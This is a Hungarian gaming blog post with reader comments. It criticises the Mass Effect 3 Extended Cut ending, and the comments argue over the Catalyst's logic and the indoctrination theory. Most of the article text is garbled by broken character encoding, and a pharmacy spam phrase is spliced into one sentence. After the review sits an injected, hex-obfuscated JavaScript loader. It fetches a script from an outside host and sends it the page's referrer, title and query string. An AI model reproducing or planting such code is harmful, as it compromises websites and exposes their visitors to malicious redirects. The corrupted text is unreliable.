Extended Cut – elsA� benyomA?sok

Mire PC-re tA�lthetA�vA� vA?lt az Extended Cut, addigra mA?r rA�g fent voltak a Youtube-on az A?j befejezA�sek. A vA�lemA�nyemet remekA?l A�sszefoglalja az a tA�ny, hogy a videA?k vA�gignA�zA�se pont elA�g is volt nekem, nem vacakolok a DLC letA�ltA�sA�vel.

Nem A?jdonsA?g, hiszen hangsA?lyoztA?k eleget – de a Bioware tovA?bbra is konokul ragaszkodott az eredeti befejezA�shez, viszont csinA?lt hozzA? kA�rA�tA�st. Amely kA�rA�tA�s isteni jA?l meg van csinA?lva, tA�nyleg, le a kalappal. De hiA?ba A�tcsillagos a sA?ltkrumpli, ha a rA?ntott hA?s romlott, nem tudok jA? kA�pet vA?gni az ebA�dhez.

TA�ny: picivel tA�bbet beszA�lhetA?nk a Catalysttal; megmutatjA?k, hogy a Normandy hogyan szedi fel a csapattA?rsainkat – bA?r hogy mennyire logikus dolog egy kimentA�sre vA?rni perceket a vA�gsA� roham idejA�n, majd mA�g bA?csA?zkodA?ssal is idA�t tA�lteni, azt ne firtassuk. Kicsit A?tdesignoltA?k a relA�robbanA?sokat is, A?gyhogy most mA?r ez tA�nyleg nem tA�nik vA�gzetesnek. A Normandy menekA?lA�se a NaprendszerbA�l egy fokkal logikusabb – bA?r a karaktereket ismerve nehezen hihetA�, hogy Garrus lenne az, aki sA?rgetnA� Jokert, hogy ugorjon vA�gre.

A lA�nyeg sajnos nem vA?ltozott: az utolsA? pillanatban elA�rA?ngatott, MA?trixbA?l, Deus Ex-bA�l A�s Battlestar GalacticA?bA?l szA?nalmasan A�sszefA�rcelt “megoldA?s” az tovA?bbra is szA?nalmas marad. SA�t. Mivel tA�bbet beszA�lhetA?nk a Catalysttal, ezA�rt mA�g fA?jdalmasabban nyilvA?nvalA?vA? vA?lnak a logikai bukfencek a mondanivalA?jA?ban: minden egyes hA?ttA�rinfA?ja A?jabb logikai lyukat A?t a magyarA?zatba. Minden egyes A?jabb mondata egy A?jabb szA�g a Mass Effect koporsA?jA?ba.

Egy A?j befejezA�si lehetA�sA�get azA�rt kaptunk: visszautasA�thatjuk a Catalyst kifacsart logikA?jA?t, ami sok-sok rajongA?nak a kA�vA?nsA?ga volt. A megvalA?sA�tA?s nagyjA?bA?l olyan, mintha a Bioware a kA�zA�psA� ujjA?t mutatnA? a rajongA?knak: “Nem tetszik a hA?rom, hA�dekomolyan mA�vA�szi befejezA�sA?nk? Akkor kapd be!”. Paradox mA?don azonban ez a bA�vA�tett game overA�az, ami a legkA�zelebb A?ll a sorozat korA?bbi szellemisA�gA�hez.

A bA�vA�tett epilA?gusok viszont jA?l nA�znek ki, A�s jA?l is vannak narrA?lva – igaz, ezek alig tA�bbek, mint egy Power Point prezentA?ciA? zenA�vel meg hangalA?mondA?ssal. De legalA?bb a kA�pek szA�pek, A�s valA?ban ad egy lezA?rA?s-A�rzetet a jA?tA�kosnak.

Az Extended Cut augmentin ordering no prescription. -tal vA�gA?lis a Bioware bevA?ltotta, amit A�gA�rt, jobb lezA?rA?st csinA?lt anA�lkA?l, hogy hozzA?nyA?lt volna a valA?di problA�mA?hoz. Nagy kA?r ezA�rt a franchise-A�rt, benne volt a lehetA�sA�g, hogy a Mass Effect legyen a kA�vetkezA� Star Trek vagy Star Wars kaliberA� vilA?gsiker. Sajnos a stA?bot az elsA� kA�t rA�sz sikere elA�ggA� arrogA?nssA? tette ahhoz, hogy mA?r ne akarjA?k kiszolgA?lni a jA?tA�kosokat, inkA?bb valami rosszul A�rtelmezett “mA�vA�szi” vA�ziA?t akarjanak rA?nk erA�ltetni.

 var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Szerző:

Merras

A Miyazaki Jun nem álnév, echte original japán importárú vagyok apai részről. Amikor épp nem valami sci-fi honlapot hegesztek, vagy rendezvényt csinálok, akkor kénytelen vagyok dolgozni, ennek kapcsán online marketing tanácsadóként tevékenykedem.

119 thoughts on “Extended Cut – elsA� benyomA?sok”

  1. Nem értek egyet, szerintem jó lett a befejezés. Miért kéne mindennek mindenki számára pozitívan végződnie? Jobb lenne, ha Shepard megint előfutna a romok közül, mint az egyben? Ez egy elveszett harc volt, itt volt az idő, hogy áldozatokat követeljen magának.

    És milyen logikai bukfencekre gondolsz? Azért ezt nem ártana kifejteni jobban! 😉

  2. SPOLER
    1-2 lukat betömtek, és ha az ember utálja EDIt, meg amúgy is a geth kiirtására szavazott, akkor a destroy nem is olyan rossz. Amúgy igen, meg a többi is, a szintézis egyre inkább… Próbálta valaki a visszautasítást 6000 eff mellett? Hátha pozitívabb lesz. (ill. bónusz kérdés, Jack hogy jöhet a csapatba, az akadémián kell letiltani a kölykökről?)

  3. SPOILER: sztem ez valamiféle gúny a Bio/EAware részéről: “Nem tetszik a mi édes kis starchild-unk? Akkor megdöglesz, fekszik-nyugszik-kussol.” Amit hozzátennék: ééééés nem vesz tőletek játékot soha többé.

  4. @Commander Shepard:

    Megmaradt az alap logikai bukfenc, mely szerint:
    – a szintetikusok mindig fellázadnak az organikusok ellen
    – ezért csináltam egy adag szintetikust
    – akik 50.000 évente kiirtják az egész galaxist
    – ezzel lehetetlenné téve, hogy a szintetikusok fellázadjanak és kiirtsák az organikusokat.

    Ezt sikerült az új dialógusokkal megfejelni. Mint például, hogy az eredeti faj, akik megcsinálták a Catalystot, azoknak nem volt elég bajuk a meglévő AI-kkal, a probléma megoldására létrehoztak egy újabb szintetikust.

    Vagy hogy pl. a Catalyst már próbálkozott a szintézissel valamelyik korábbi ciklusban, de nem működött, mert a szintézist nem lehet ráerőltetni a galaxisra. Fél perccel később, ha úgy dönt, Shepard ráerőlteti a galaxisra a szintézist.

    1. Látom, Te se figyeltél oda rendesen, de már logikátlanságokkal dobálózol. A Reaper nem csak egy gépi faj, nagyrészt organikusok, tudatos, érző gépek. A céljuk, hogy a FEJLETLEN organikusokat védjék a fejlettektől. A galaxis körforgását tartják fenn. Ha nem léteznének, előbb utóbb a fejlett lények elnyomnák, vagy kipusztítanák a fejletleneket. A legrosszabb eshetőség az, ha egy sima szintetikus faj pusztít ki minden életet. Miért tartják veszélyesnek a szintetikus fajokat? Mert nincsenek érzelmeik, nem kötődnek senkihez és semmihez, még akár alkotóik ellen is fordulhatnak. Itt nem azért “ölik le” a fejletteket, mert nem akarják, hogy egy másik tegye meg helyettük, hanem mert ezzel adnak esélyt, hogy felcseperedjenek a még fejletlenek.

      1. Ezt a fejletleneket védik a fejlettől részt szerintem kihagyhatjuk, mert azon kívül, hogy nem lehet védeni őket ötvenezer éves távollét alatt (az alatt azért elég sok fejletlen faj leigázható :)), még csak szó sincs ilyesmiről. A gépek lázadásától védenek, ami érte a Protheanokat, a quarianokat és azokat is, akik teremtették CsillagPöcsit. A Kaszásokat CsillagFütyi hozta össze, miután arra a konszenzusra jutott, hogy a gépek lázadását csak így lehet elkerülni (tudom már, honnan ismerős ez a kifacsart logika: 0. A robotnak nem szabad kárt okoznia az emberiségben, vagy tétlenül tűrnie, hogy az emberiség bármilyen kárt szenvedjen. Ez Herbie számára lehetővé teszi, hogy ártson egy embernek, noha az tiltott az 1. törvény által. Itt valami hasonló a helyzet: CsillagTöki létrehozhatta a Kaszásokat, mint organikus-gépeket azért, hogy azzal kordában tartsa a géplényeket, egyúttal új életalternatívát kínáljon a learatott lényeknek -> kényszerített szintézis -> a félresikerült eredmények egyike? Megoldás, de nem a lehetséges legjobb megoldás).

    2. Egyrészt nem irtják ki a teljes galaxist, csak a fejlett organikus, szintetikus fajokat. Töki mondja is, hogy ezért hagytak minket békén, amikor utoljára itt jártak. Másrészt nem eltörli őket a létezésből, hanem Kaszást csinál belőlük, amiről mellesleg a Kaszások állítják, hogy ez a forma a fejlődés csúcsa. Ebben a dologban egy csúnyaság van: Hogy az érintetteket nem kérdezik meg, akarják-e ezt a fajta fejlődést.

  5. Hát maximálisan nem tudok egyetérteni. Ez így kérem szépen már simán hozza az első két rész szintjét, néhány pillanatában lazán túl is szárnyalja és méltó lezárást kapott a trilógia. Visszaállították a franchise renoméját. Köszi Bioware, visszaállítottátok a hitemet.

    A fő probléma: nos, az ősök tévedtek. Megalkottak egy gépet, hátha azzal védekezhetnek egyéb gépek ellen. Mert ugye mi is teljesen logikusan gondolkodunk. Ha építünk egy fegyvert, és azt az ellenség ellenünk kezdi el használni, mit lépünk? Építünk egy másik, de elemeiben ugyanolyan fegyvert, hátha az majd segít. Annyi a különbség, hogy itt nem valaki más kezdte használni az első fegyvert, hanem az maga támadt az ősökre. Ez az ősi faj hozott egy rossz döntést, megitták a levét ők is, meg az utánuk következő pár ezer civilizáció is. Szerintem nem elképzelhetetlen egy döntésekről szóló sztoriban, hogy valaki rossz döntést hozott. Sajnos nekik nem volt vörösre festve a válaszlehetőség. 🙂
    És ugye a Sithek is azért akarnak uralkodni, mert szimplán gonoszok. És a Vorlonok és az Árnyak is úgy döntenek egy piti vitáról, hogy civilizációkat uszítanak egymás ellen. Ezek sem sokkal értelmesebb indokok.

    A Kaszások, nos, először is, a fáma úgy szól, hogy teremtmények lázadnak a teremtő ellen. Ezt a Kaszások igazolják. Viszont a Kaszások nem gépek, és a játékban a gépi életformákra helyezték a hangsúlyt, az MI-kre. A Kaszások nem MI-k, bár egy MI irányítja őket.
    Viszont még így is részesei a problémának, vagyis a teremtmény a teremtő ellen tőr. Szóval nem mond ellent a dolognak, éppen ellenkezőleg, igazolja. Az más kérdés, hogy egy olyan faj okozta ezt a dolgot, aki nem tanult saját hibájából. De hát ugye ez is el lett mondva: még ha el is pusztítjuk a Kaszásokat, előbb-utóbb újra gépeket fogunk építeni, akik – elméletben (hál isten kivették azt a mondatot, ami kizárja a békés együttélést) – esélyes, hogy nekünk fognak ugrani. És igen, totálisan nem elképzelhetetlen, hogy a Pusztítás vég után X ezer év múlva alkotunk még egy adag gethet, vagy saját Kaszást. Sőőőt, még simán kinézhető az is, hogy nekiesik valaki a getheknek, vagy a Kaszás technológiát használva épít valamit (ami ugye EDI-t is teremtette). Szóval mi tanultunk? Hát nem valószínű. Így jártak az ősök is, lett is belőlük gyorsan Harbinger.

    A szintézis viszont tényleg gáz, azt nem kellett volna mondani, hogy nem lehet ráerőltetni. Inkább valami technoblabla kellett volna, hogy próbálkozott, de nem talált olyan esszenciát vagy valami.

    A Normandy lopakodó. Harbinger valószínűleg ezért nem látta. Elég sűrűn a szánkba rágták, hogy ha a Normandy lopakodik, akkor csak szabad szemmel látható. Ilyenje Harbingernek nyilván nincs. (Persze hülyeség, hiszen lehetnek más, videó vagy audió alapú érzékelői, de ezen a szinten az egész lopakodó Normandy koncepció hülyeség, mivel kamerát még egy emberi űrhajóra is lehet – sőt, szoktak – szerelni, szóval a Normandy ebben a formában nagyon nem lopakodhatna. Az mégis lopakodik már az ME1 óta. :))

  6. Valamelyest egyetértek Merrasszal, valamelyest nem. Én azt érzem, hogy ez a befejezés továbbra is ellent mond mindannak, amit eddig a Mass Effectben a Reaperekről és az indíttatásukról megtudhattunk. Továbbra is azt érzem, hogy egy A játékkal játszottam és egy B játék befejezését kaptam.

    Ugyanakkor azt kell, hogy mondjam, a BioWare szépen összerakta a befejezést ezzel a kibővített változattal. Ebben a formában már el tudom fogadni a “művészi szabadságra” történő hivatkozást – még akkor is, ha szerintem bizonyos elemeiben inkább beszélhetünk plágiumról, mintsem művészi szabadságról, és még akkor is, ha van egy-két bukfenc.

    A szellem kölyök dumáját a szintézisnél én sem értettem… nem lehet ráerőltetni? Akkor mi mit csinálunk? Meg sem kérdezzük a galaxis népeit, és rájuk erőltetünk egy új életformát. Teljesen abszurd, egyetértek Dzsejttel, erre más magyarázatot kellett volna adni.

    Amúgy pedig az, hogy a Normandyt nem puffantják le a Kaszások, és Harbinger sem, elég egyszerű a válasz: a második részben beleszereltek egy Reaper IFF-et a gépünkbe 🙂 Ezért valószínűleg, ha nagyon nem huncutkodunk (szkennelünk orrba-szájba), akkor a Kaszások vagy nem látnak minket, vagy úgy veszik, hogy egy vagyunk közülük.

    1. Szerintem Shepard azért nem ráerőltetés, mert a galaxis összes faja felsorakozott mögötte, össze tudta hozni a galaxis népeit, így önszántukból is osztoznának az “ő dns-n”. A ráerőletést valószínű nem szó szerint kell érteni, hanem az előzőekben nem létezett olyan életforma akire úgymond a többi vakon rábízta volna magát. Ezért nem lett volna sikere egy ilyen szintézisnek.

  7. “Én azt érzem, hogy ez a befejezés továbbra is ellent mond mindannak, amit eddig a Mass Effectben a Reaperekről és az indíttatásukról megtudhattunk.”
    Mindentől függetlenül, szerintem a Kaszásokról és az indíttatásukról nem sok mindent tudtunk meg az első két részben. 🙂 Ez csípte is a csőröm a szériával kapcsolatban, egyben ez volt az egyik legérdekesebb sztorielem a sok lenyúlt sztorielem közül. Tudtuk, hogy élő űrhajók, hogy baromi nehéz kinyírni őket, tudnak indoktrinálni, civilizációk learatásából születnek és az a fixa ideálljuk, hogy a galaxis ötvenezer évenkénti sterilizálásával szívességet tesznek nekünk. Minden más csak üres locsogás volt a részükről, csilli-villi szavak mögé bújtatott semmi. Főleg Harbinger szövege ilyen. Mint egy pap, aki prédikál, de a szavai annyira üresek, hogy abba bárki bármit beleláthat. Tényleges információt nem közöl.

  8. Fura, én nem akadtam fent ezen a ráerőltetésen. Szerintem arra érti ezt a Töki, hogy az organikusok nem voltak még elég fejlettek a dologhoz, egyszerűen nem álltak készen. Ehhez kapcsolódik az, amikor mondja, hogy ez a fajta, amúgy bevallottan rossz Kaszásmegoldás sem működik már, mert az organikusok olyan messze fejlődtek ugyanolyan hosszú ciklus alatt, hogy megépítették a Crucible-t, és ott van Shepard, az első organikus, aki ott áll a Töki előtt. Szóval szerintem egyszerűen arról van szó, hogy amikor próbálkoztak a szintézissel, még nem voltak eléggé fejlettek az organikusok ahhoz, hogy működjön. A mi ciklusunkban viszont már fejlettebb volt az organikus forma, mint akkor, amikor próbálkoztak vele. A szintézist tehát nem lehet csak úgy erőltetni, meg kellett várni, hogy eléggé fejlettek legyenek az organikusok hozzá. Elég furán hangzik tudom, de én erre következtettem.

  9. Sziasztok!
    Azért egy dolgot elfelejt itt mindenki. INDOKTRINÁCIÓ! Szép, hogy ilyen logikai bukfenceken vitatkoztok, de én úgy emlékszem ez volt a legnagyobb kérdés. Hogy most akkor Shep csak képzeli a végét, és doktrináció alá kerül, vagy ami a Citadel-en történik az tényleg, a fizikai valóság síkján le is játszódik. Sajnos erre egyértelmű utalást nem kaptam. Sőt LEGNAGYOBB sajnálatomra, hallgattak a vinnyogó tömegre, és teljesen kihagyták ezt a lehetőséget, koncepciót (ami tegyük hozzá szerintem az alap koncepció volt.) Ajánlom mindenkinek felkeresni a neten a doktrináció mellett szoló érveket. Nem lehet nem elfogadni őket. (kifogyhatatlan lőszer, direkt fordított paragon-renegád döntések – pl. IllusiveMan lelövése még mindig renegád, pedig egyértelmű, hogy a sztori szempontjából az paragon döntés, de az indoktrináció teóriáját tökéletsen alátámasztja a csere). Persze hagytak benne utalást. A DLC installja után, mikor felébred Shep a Citadellen, Anderson hívja: Shep, s ugyanarra morajra ébred, mint amikor a 3-ik rész elején a gyerek eltünt a lukból, ami egyébként a donktrináció jele.
    Sajnálom a Bioware-t. Sajnálom azért mert egy ilyen elbutult, COD-on nevelkedett játékos társadalmat kell kiszolgálnia. (Akinek nincs ige, ne vegye fel…) Sajnálom azért, mert valami fantasztikusat alkottak a harmadik rész befejezésével, s csak nagyon kevesen értékelték a munkájukat. Sajnálom őket azért, mert rájuk erőltették, hogy egy ilyen DLC-t kidobjanak (valószínüleg EA nyomásra, csakis PR és marketing szempotból).
    Hol tudtuk magunkat úgy beleélni egy fiktív (sci-fi) univerzumba, mint ez alatt a 3 rész alatt? Hol tudtunk magunknak olyan ismerettségeket, barátokat szerezni mint Garrus, Talli, Liara? Hol vannak olyan mellékszereplők játékokban, akikért ténylegesen aggódunk, érdekel, hogy mi lesz a sorsuk? Hol van még olyan világ egy játékban, ami ennyire kidolgozott, élvezetes? Hol kapunk ilyen döntési befolyásoltságot, mint itt? Sok játéknek lehet példa a Mass Effect.
    S meg tudom érteni, hogy nem tartottak ki az eredeti doktrináció lehetőség mellett. Sokáig nem értettem miért nem dobják be, amit én igazán akartam, hogy ez nem Shep utolsó sztorija. Valószínüleg vártak (várnak) a válaszreakciókra. Azonban ilyen visszhangok után én is fel lennék húzva. Mikor csak egy kicsit is gondolkodni kell, akkor csak panaszkodunk, s fehér-fekete barátok közt szintű befejezést akarunk.
    Mégegyszer akinek nem inge, ne vegye magára. Nem akartam itt senkit megbántani. Csak gondoltam képviselem itt ezt az álláspontot is. Azokét, akik azt mondják életük egyik legnagyobb élménye volt a Mass Effect 3 befejezése. Aki nem ért egyet azzal szívesen vitázom, aki egyetért annak örülök. Minden tiszteletem a Bioware-é!

    1. Nem tudom, te milyen fórumokat böngésszél, de a rajongók többsége nem azért visított, hogy NE legyen igaz az indoktrináció, hanem inkább azért, hogy a Bioware vállalja be ezt a zseniális teóriát, és ezek alapján építse fel a játékot.

Hozzászólások lehetősége itt nem engedélyezett.